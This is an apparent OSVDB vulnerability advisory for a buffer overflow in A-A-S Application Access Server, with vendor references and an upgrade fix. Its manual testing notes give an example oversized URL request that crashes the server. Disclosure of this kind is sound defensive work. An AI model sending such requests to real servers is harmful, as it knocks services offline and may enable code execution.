Application Access Server Long HTTP Request DoS

2004-02-02T09:43:04
ID OSVDB:3801
Type osvdb
Reporter OSVDB
Modified 2004-02-02T09:43:04

Description

Vulnerability Description

A remote overflow exists in A-A-S Application Access Server. The A-A-S fails to handle a long file request over 1530 characters resulting in a buffer overflow. With this request, an attacker can cause A-A-S to crash resulting in a loss of availability. The buffer overflow might be used for executing code.

Technical Description

All prior versions may be affected.

Solution Description

Upgrade to version 1.0.38 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

A remote overflow exists in A-A-S Application Access Server. The A-A-S fails to handle a long file request over 1530 characters resulting in a buffer overflow. With this request, an attacker can cause A-A-S to crash resulting in a loss of availability. The buffer overflow might be used for executing code.

Manual Testing Notes

Do a standard long file request of about 1530 characters. Example: http://server:6262/[1530*char]

References:

Vendor URL: http://www.applicationaccessserver.de/index_en.html Secunia Advisory ID:10762 Other Advisory URL: http://members.lycos.co.uk/r34ct/main/A-A-S/AAS1_0_3.TXT ISS X-Force ID: 15003 CVE-2004-2169